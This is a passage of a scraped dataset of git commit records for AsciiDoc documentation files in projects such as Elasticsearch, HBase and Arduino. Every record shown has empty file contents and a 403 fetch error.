,MaineC\/elasticsearch,F0lha\/elasticsearch,clintongormley\/elasticsearch,gmarz\/elasticsearch,glefloch\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,yanjunh\/elasticsearch,brandonkearby\/elasticsearch,polyfractal\/elasticsearch,camilojd\/elasticsearch,markwalkom\/elasticsearch,ivansun1010\/elasticsearch,mortonsykes\/elasticsearch,JervyShi\/elasticsearch,ESamir\/elasticsearch,jpountz\/elasticsearch,mikemccand\/elasticsearch,alexshadow007\/elasticsearch,davidvgalbraith\/elasticsearch,artnowo\/elasticsearch,njlawton\/elasticsearch,palecur\/elasticsearch,Helen-Zhao\/elasticsearch,MaineC\/elasticsearch,HonzaKral\/elasticsearch,awislowski\/elasticsearch,JackyMai\/elasticsearch,wbowling\/elasticsearch,jprante\/elasticsearch,davidvgalbraith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,camilojd\/elasticsearch,jimczi\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,MisterAndersen\/elasticsearch,liweinan0423\/elasticsearch,coding0011\/elasticsearch,snikch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,diendt\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,rhoml\/elasticsearch,naveenhooda2000\/elasticsearch,palecur\/elasticsearch,mapr\/elasticsearch,C-Bish\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,wenpos\/elasticsearch,palecur\/elasticsearch,Shepard1212\/elasticsearch,ESamir\/elasticsearch,i-am-Nathan\/elasticsearch,rmuir\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,ZTE-PaaS\/elasticsearch,artnowo\/elasticsearch,dpursehouse\/elasticsearch,glefloch\/elasticsearch,vroyer\/elasticassandra,mjason3\/elasticsearch,awislowski\/elasticsearch,fred84\/elasticsearch,mapr\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,episerver\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,wbowling\/elasticsearch,snikch\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,markharwood\/elasticsearch,naveenhooda2000\/elasticsearch,AndreKR\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrejserafim\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elassandra,ESamir\/elasticsearch,qwerty4030\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,avikurapati\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,PhaedrusTheGreek\/elasticsearch,fernandozhu\/elasticsearch,davidvgalbraith\/elasticsearch,i-am-Nathan\/elasticsearch,JervyShi\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,martinstuga\/elasticsearch,HonzaKral\/elasticsearch,mapr\/elasticsearch,nomoa\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,girirajsharma\/elasticsearch,awislowski\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,nazarewk\/elasticsearch,kaneshin\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,camilojd\/elasticsearch,F0lha\/elasticsearch,shreejay\/elasticsearch,bawse\/elasticsearch,nomoa\/elasticsearch,wangtuo\/elasticsearch,StefanGor\/elasticsearch,myelin\/elasticsearch,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,girirajsharma\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,ivansun1010\/elasticsearch,tebriel\/elasticsearch,markharwood\/elasticsearch,rhoml\/elasticsearch,JackyMai\/elasticsearch,cwurm\/elasticsearch,markharwood\/elasticsearch,episerver\/elasticsearch,jchampion\/elasticsearch,F0lha\/elasticsearch,kalimatas\/elasticsearch,andrejserafim\/elasticsearch,obourgain\/elasticsearch,tebriel\/elasticsearch,IanvsPoplicola\/elasticsearch,clintongormley\/elasticsearch,Helen-Zhao\/elasticsearch,jchampion\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,nomoa\/elasticsearch,rmuir\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,avikurapati\/elasticsearch,ivansun1010\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra5-rc,dpursehouse\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra5-rc,coding0011\/elasticsearch,liweinan0423\/elasticsearch,yynil\/elasticsearch,shreejay\/elasticsearch,masaruh\/elasticsearch,scottsom\/elasticsearch,liweinan0423\/elasticsearch,ricardocerq\/elasticsearch,yynil\/elasticsearch,strapdata\/elassandra,girirajsharma\/elasticsearch,sreeramjayan\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,martinstuga\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,jchampion\/elasticsearch,C-Bish\/elasticsearch,ricardocerq\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,vroyer\/elasticassandra,mmaracic\/elasticsearch,snikch\/elasticsearch,MaineC\/elasticsearch,masaruh\/elasticsearch,JervyShi\/elasticsearch,cwurm\/elasticsearch,xuzha\/elasticsearch,yynil\/elasticsearch,nezirus\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,elasticdog\/elasticsearch,cwurm\/elasticsearch,kaneshin\/elasticsearch,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,jbertouch\/elasticsearch,gmarz\/elasticsearch,polyfractal\/elasticsearch,mortonsykes\/elasticsearch,coding0011\/elasticsearch,obourgain\/elasticsearch,AndreKR\/elasticsearch,wangtuo\/elasticsearch,trangvh\/elasticsearch,qwerty4030\/elasticsearch,glefloch\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,sreeramjayan\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,yynil\/elasticsearch,wbowling\/elasticsearch,girirajsharma\/elasticsearch,jchampion\/elasticsearch,jpountz\/elasticsearch,xuzha\/elasticsearch,mikemccand\/elasticsearch,mapr\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,kaneshin\/elasticsearch,ESamir\/elasticsearch,MaineC\/elasticsearch,fred84\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,diendt\/elasticsearch,rhoml\/elasticsearch,episerver\/elasticsearch,sneivandt\/elasticsearch,rmuir\/elasticsearch,pozhidaevak\/elasticsearch,polyfractal\/elasticsearch,xuzha\/elasticsearch,F0lha\/elasticsearch,diendt\/elasticsearch,awislowski\/elasticsearch,zkidkid\/elasticsearch,martinstuga\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,palecur\/elasticsearch,kaneshin\/elasticsearch,henakamaMSFT\/elasticsearch,girirajsharma\/elasticsearch,lks21c\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,spiegela\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,ESamir\/elasticsearch,jpountz\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,snikch\/elasticsearch,mapr\/elasticsearch,jbertouch\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra5-rc,myelin\/elasticsearch,geidies\/elasticsearch,qwerty4030\/elasticsearch,mikemccand\/elasticsearch,sreeramjayan\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,henakamaMSFT\/elasticsearch,jpountz\/elasticsearch,nknize\/elasticsearch,rmuir\/elasticsearch,rlugojr\/elasticsearch,mikemccand\/elasticsearch,ivansun1010\/elasticsearch,sneivandt\/elasticsearch,zkidkid\/elasticsearch,rhoml\/elasticsearch,uschindler\/elasticsearch,dpursehouse\/elasticsearch,a2lin\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,nazarewk\/elasticsearch,snikch\/elasticsearch,s1monw\/elasticsearch,dongjoon-hyun\/elasticsearch,Helen-Zhao\/elasticsearch,bawse\/elasticsearch,mmaracic\/elasticsearch,xuzha\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,dongjoon-hyun\/elasticsearch,lks21c\/elasticsearch,rhoml\/elasticsearch,vroyer\/elasticassandra,clintongormley\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,jimczi\/elasticsearch,F0lha\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,nilabhsagar\/elasticsearch,ricardocerq\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,markharwood\/elasticsearch,spiegela\/elasticsearch,tebriel\/elasticsearch,bawse\/elasticsearch,markharwood\/elasticsearch,brandonkearby\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,GlenRSmith\/elasticsearch,dpursehouse\/elasticsearch,Shepard1212\/elasticsearch,PhaedrusTheGreek\/elasticsearch,JackyMai\/elasticsearch,brandonkearby\/elasticsearch,spiegela\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,yanjunh\/elasticsearch,scorpionvicky\/elasticsearch,trangvh\/elasticsearch,sreeramjayan\/elasticsearch,glefloch\/elasticsearch,IanvsPoplicola\/elasticsearch,davidvgalbraith\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,girirajsharma\/elasticsearch,geidies\/elasticsearch,camilojd\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,jbertouch\/elasticsearch,nezirus\/elasticsearch,yanjunh\/elasticsearch,JervyShi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,mmaracic\/elasticsearch,episerver\/elasticsearch,nazarewk\/elasticsearch,avikurapati\/elasticsearch,diendt\/elasticsearch,s1monw\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,wbowling\/elasticsearch,camilojd\/elasticsearch,LeoYao\/elasticsearch,ricardocerq\/elasticsearch,strapdata\/elassandra,mapr\/elasticsearch,jbertouch\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,martinstuga\/elasticsearch,rlugojr\/elasticsearch,nomoa\/elasticsearch,JSCooke\/elasticsearch,C-Bish\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,obourgain\/elasticsearch,diendt\/elasticsearch,AndreKR\/elasticsearch,cwurm\/elasticsearch,diendt\/elasticsearch,jchampion\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,fernandozhu\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,liweinan0423\/elasticsearch,fforbeck\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,IanvsPoplicola\/elasticsearch,myelin\/elasticsearch,scottsom\/elasticsearch,andrejserafim\/elasticsearch,a2lin\/elasticsearch,polyfractal\/elasticsearch,StefanGor\/elasticsearch,polyfractal\/elasticsearch,nezirus\/elasticsearch","old_file":"docs\/community-clients\/index.asciidoc","new_file":"docs\/community-clients\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba2559428a75d9e3f0e2c5fd21ffb9bbd9a115db","subject":"[#608] Developer Guide: Fix formatting errors in the use case (#662)","message":"[#608] Developer Guide: Fix formatting errors in the use case (#662)\n\nThere are formatting errors in the use cases. For example, some use\r\ncases are not properly indented.\r\n\r\nLet's fix them.","repos":"damithc\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4","old_file":"docs\/DeveloperGuide.adoc","new_file":"docs\/DeveloperGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e248997c6b832b452b7e2166001068bbbd66c2d","subject":"Worked on Windows Search documentation","message":"Worked on Windows Search documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92e6577aea86000287ef8f3cd0f1ca65c91e1934","subject":"Update 2015-11-17-Projeto-Homens-Libertem-se.adoc","message":"Update 2015-11-17-Projeto-Homens-Libertem-se.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"581402b4a476b76c39bdfe1e31993102d7b0a800","subject":"streamline sentence","message":"streamline sentence\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"overview.adoc","new_file":"overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd0aa09cd3d283a80443b7e6a9d2bc953d5e6c82","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"609776646e245315861cb436323a1d09f40bcbdb","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6120a2d02d9caec3f325d3bc24b3c460323c5383","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30858e540f80ad28fe13b81bd83d803e06a4d86e","subject":"Create CreatingBasicApp.adoc","message":"Create CreatingBasicApp.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/tutorials\/CreatingBasicApp.adoc","new_file":"wiki\/tutorials\/CreatingBasicApp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"911bd35e4ddd9be8de0f452a61cb78bca21ee76c","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7f659cac4498bdb94fd0e2b9e4339a06eaba9c1","subject":"HBASE-14158 Add documentation for Initial Release for HBase-Spark Module integration","message":"HBASE-14158 Add documentation for Initial Release for HBase-Spark Module integration\n\nSigned-off-by: Misty Stanley-Jones <266ae30cabf4e046de6d26e3d43b9d21b534ee4c@cloudera.com>\n","repos":"ChinmaySKulkarni\/hbase,HubSpot\/hbase,Apache9\/hbase,bijugs\/hbase,JingchengDu\/hbase,HubSpot\/hbase,francisliu\/hbase,Eshcar\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,mahak\/hbase,JingchengDu\/hbase,ultratendency\/hbase,francisliu\/hbase,HubSpot\/hbase,HubSpot\/hbase,ultratendency\/hbase,mahak\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,mahak\/hbase,vincentpoon\/hbase,mahak\/hbase,HubSpot\/hbase,JingchengDu\/hbase,Eshcar\/hbase,francisliu\/hbase,apurtell\/hbase,Apache9\/hbase,ultratendency\/hbase,mahak\/hbase,apurtell\/hbase,Eshcar\/hbase,vincentpoon\/hbase,ultratendency\/hbase,Apache9\/hbase,gustavoanatoly\/hbase,apurtell\/hbase,ndimiduk\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,Apache9\/hbase,ndimiduk\/hbase,francisliu\/hbase,mahak\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,apurtell\/hbase,ChinmaySKulkarni\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,Apache9\/hbase,bijugs\/hbase,ultratendency\/hbase,JingchengDu\/hbase,francisliu\/hbase,Eshcar\/hbase,HubSpot\/hbase,ultratendency\/hbase,JingchengDu\/hbase,JingchengDu\/hbase,Eshcar\/hbase,JingchengDu\/hbase,ultratendency\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,apurtell\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,ndimiduk\/hbase,ndimiduk\/hbase,gustavoanatoly\/hbase,bijugs\/hbase,JingchengDu\/hbase,mahak\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,bijugs\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,HubSpot\/hbase,Apache9\/hbase,mahak\/hbase,JingchengDu\/hbase,Apache9\/hbase,gustavoanatoly\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,bijugs\/hbase,bijugs\/hbase,Eshcar\/hbase,apurtell\/hbase,Apache9\/hbase,vincentpoon\/hbase,JingchengDu\/hbase,HubSpot\/hbase,Apache9\/hbase,Apache9\/hbase,ndimiduk\/hbase,gustavoanatoly\/hbase,ultratendency\/hbase,ultratendency\/hbase,vincentpoon\/hbase,gustavoanatoly\/hbase,apurtell\/hbase,ndimiduk\/hbase,francisliu\/hbase,francisliu\/hbase,francisliu\/hbase,ndimiduk\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,mahak\/hbase,mahak\/hbase,Eshcar\/hbase,bijugs\/hbase,apurtell\/hbase,gustavoanatoly\/hbase,bijugs\/hbase,francisliu\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/spark.adoc","new_file":"src\/main\/asciidoc\/_chapters\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ultratendency\/hbase.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"733da0548dba4d1c2cbf727d833898a1e31c7ace","subject":"Update 2016-04-11-x.adoc","message":"Update 2016-04-11-x.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-11-x.adoc","new_file":"_posts\/2016-04-11-x.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84b9cc1391d160a13400c59411f65bcfbc2aebb0","subject":"Add solr search documentation","message":"Add solr search documentation\n","repos":"paulcwarren\/spring-content,paulcwarren\/spring-content,paulcwarren\/spring-content","old_file":"spring-content-solr\/src\/main\/asciidoc\/solr-search.adoc","new_file":"spring-content-solr\/src\/main\/asciidoc\/solr-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/paulcwarren\/spring-content.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e544891718a5e5e99ef5892fc09b85fc5b55f782","subject":"Update manpage.adoc","message":"Update manpage.adoc","repos":"steamboating\/Arduino,ricklon\/Arduino,henningpohl\/Arduino,lukeWal\/Arduino,me-no-dev\/Arduino-1,jabezGit\/Arduino,laylthe\/Arduino,bsmr-arduino\/Arduino,majenkotech\/Arduino,gestrem\/Arduino,byran\/Arduino,acosinwork\/Arduino,andyvand\/Arduino-1,ashwin713\/Arduino,ntruchsess\/Arduino-1,HCastano\/Arduino,niggor\/Arduino_cc,byran\/Arduino,zederson\/Arduino,gestrem\/Arduino,NaSymbol\/Arduino,ForestNymph\/Arduino_sources,jmgonzalez00449\/Arduino,KlaasDeNys\/Arduino,ikbelkirasan\/Arduino,jabezGit\/Arduino,talhaburak\/Arduino,bigjosh\/Arduino,niggor\/Arduino_cc,eddyst\/Arduino-SourceCode,KlaasDeNys\/Arduino,KlaasDeNys\/Arduino,eduardocasarin\/Arduino,vbextreme\/Arduino,lulufei\/Arduino,tomkrus007\/Arduino,tbowmo\/Arduino,jamesrob4\/Arduino,garci66\/Arduino,niggor\/Arduino_cc,karlitxo\/Arduino,snargledorf\/Arduino,superboonie\/Arduino,pdNor\/Arduino,xxxajk\/Arduino-1,tomkrus007\/Arduino,ForestNymph\/Arduino_sources,tomkrus007\/Arduino,jaimemaretoli\/Arduino,ashwin713\/Arduino,eduardocasarin\/Arduino,majenkotech\/Arduino,majenkotech\/Arduino,shannonshsu\/Arduino,laylthe\/Arduino,bigjosh\/Arduino,tommyli2014\/Arduino,zaiexx\/Arduino,vbextreme\/Arduino,stevemayhew\/Arduino,jamesrob4\/Arduino,henningpohl\/Arduino,vbextreme\/Arduino,wilhelmryan\/Arduino,lulufei\/Arduino,cscenter\/Arduino,onovy\/Arduino,steamboating\/Arduino,NaSymbol\/Arduino,henningpohl\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,ccoenen\/Arduino,lulufei\/Arduino,ikbelkirasan\/Arduino,tbowmo\/Arduino,ari-analytics\/Arduino,garci66\/Arduino,Gourav2906\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,NaSymbol\/Arduino,pdNor\/Arduino,superboonie\/Arduino,stickbreaker\/Arduino,eduardocasarin\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,talhaburak\/Arduino,vbextreme\/Arduino,henningpohl\/Arduino,gberl001\/Arduino,andyvand\/Arduino-1,NicoHood\/Arduino,bigjosh\/Arduino,wilhelmryan\/Arduino,tommyli2014\/Arduino,wayoda\/Arduino,ogferreiro\/Arduino,stevemayhew\/Arduino,stevemayhew\/Arduino,tomkrus007\/Arduino,chaveiro\/Arduino,cscenter\/Arduino,shannonshsu\/Arduino,bigjosh\/Arduino,tomkrus007\/Arduino,laylthe\/Arduino,nandojve\/Arduino,kidswong999\/Arduino,wilhelmryan\/Arduino,arunkuttiyara\/Arduino,vbextreme\/Arduino,ari-analytics\/Arduino,NicoHood\/Arduino,stickbreaker\/Arduino,gestrem\/Arduino,ogferreiro\/Arduino,ccoenen\/Arduino,Chris--A\/Arduino,tommyli2014\/Arduino,niggor\/Arduino_cc,ashwin713\/Arduino,nandojve\/Arduino,jamesrob4\/Arduino,eggfly\/arduino,adamkh\/Arduino,xxxajk\/Arduino-1,laylthe\/Arduino,chaveiro\/Arduino,KlaasDeNys\/Arduino,ashwin713\/Arduino,shannonshsu\/Arduino,eddyst\/Arduino-SourceCode,bsmr-arduino\/Arduino,Gourav2906\/Arduino,ForestNymph\/Arduino_sources,eddyst\/Arduino-SourceCode,bsmr-arduino\/Arduino,gberl001\/Arduino,jaimemaretoli\/Arduino,zaiexx\/Arduino,ForestNymph\/Arduino_sources,cscenter\/Arduino,ricklon\/Arduino,arunkuttiyara\/Arduino,PeterVH\/Arduino,jabezGit\/Arduino,superboonie\/Arduino,ogferreiro\/Arduino,PaoloP74\/Arduino,lukeWal\/Arduino,onovy\/Arduino,arunkuttiyara\/Arduino,karlitxo\/Arduino,ogferreiro\/Arduino,bsmr-arduino\/Arduino,snargledorf\/Arduino,NicoHood\/Arduino,ntruchsess\/Arduino-1,NaSymbol\/Arduino,snargledorf\/Arduino,kidswong999\/Arduino,zaiexx\/Arduino,cscenter\/Arduino,stickbreaker\/Arduino,ashwin713\/Arduino,ashwin713\/Arduino,zaiexx\/Arduino,pdNor\/Arduino,superboonie\/Arduino,nandojve\/Arduino,lukeWal\/Arduino,andyvand\/Arduino-1,jamesrob4\/Arduino,eduardocasarin\/Arduino,me-no-dev\/Arduino-1,PeterVH\/Arduino,ForestNymph\/Arduino_sources,PaoloP74\/Arduino,eddyst\/Arduino-SourceCode,shannonshsu\/Arduino,steamboating\/Arduino,jmgonzalez00449\/Arduino,jmgonzalez00449\/Arduino,eggfly\/arduino,garci66\/Arduino,eggfly\/arduino,Chris--A\/Arduino,NaSymbol\/Arduino,jaimemaretoli\/Arduino,kidswong999\/Arduino,tskurauskas\/Arduino,xxxajk\/Arduino-1,ikbelkirasan\/Arduino,lukeWal\/Arduino,jmgonzalez00449\/Arduino,ccoenen\/Arduino,KlaasDeNys\/Arduino,steamboating\/Arduino,jabezGit\/Arduino,tomkrus007\/Arduino,zederson\/Arduino,ari-analytics\/Arduino,ricklon\/Arduino,wilhelmryan\/Arduino,arunkuttiyara\/Arduino,adamkh\/Arduino,karlitxo\/Arduino,garci66\/Arduino,lukeWal\/Arduino,eddyst\/Arduino-SourceCode,tomkrus007\/Arduino,shannonshsu\/Arduino,niggor\/Arduino_cc,KlaasDeNys\/Arduino,henningpohl\/Arduino,Gourav2906\/Arduino,jabezGit\/Arduino,stevemayhew\/Arduino,jaimemaretoli\/Arduino,vbextreme\/Arduino,chaveiro\/Arduino,ccoenen\/Arduino,talhaburak\/Arduino,pdNor\/Arduino,nandojve\/Arduino,zaiexx\/Arduino,jabezGit\/Arduino,zederson\/Arduino,jmgonzalez00449\/Arduino,majenkotech\/Arduino,pdNor\/Arduino,stickbreaker\/Arduino,nandojve\/Arduino,Chris--A\/Arduino,xxxajk\/Arduino-1,garci66\/Arduino,kidswong999\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,KlaasDeNys\/Arduino,wayoda\/Arduino,NicoHood\/Arduino,eggfly\/arduino,karlitxo\/Arduino,talhaburak\/Arduino,eddyst\/Arduino-SourceCode,stevemayhew\/Arduino,henningpohl\/Arduino,niggor\/Arduino_cc,me-no-dev\/Arduino-1,ikbelkirasan\/Arduino,vbextreme\/Arduino,ogferreiro\/Arduino,eggfly\/arduino,xxxajk\/Arduino-1,Gou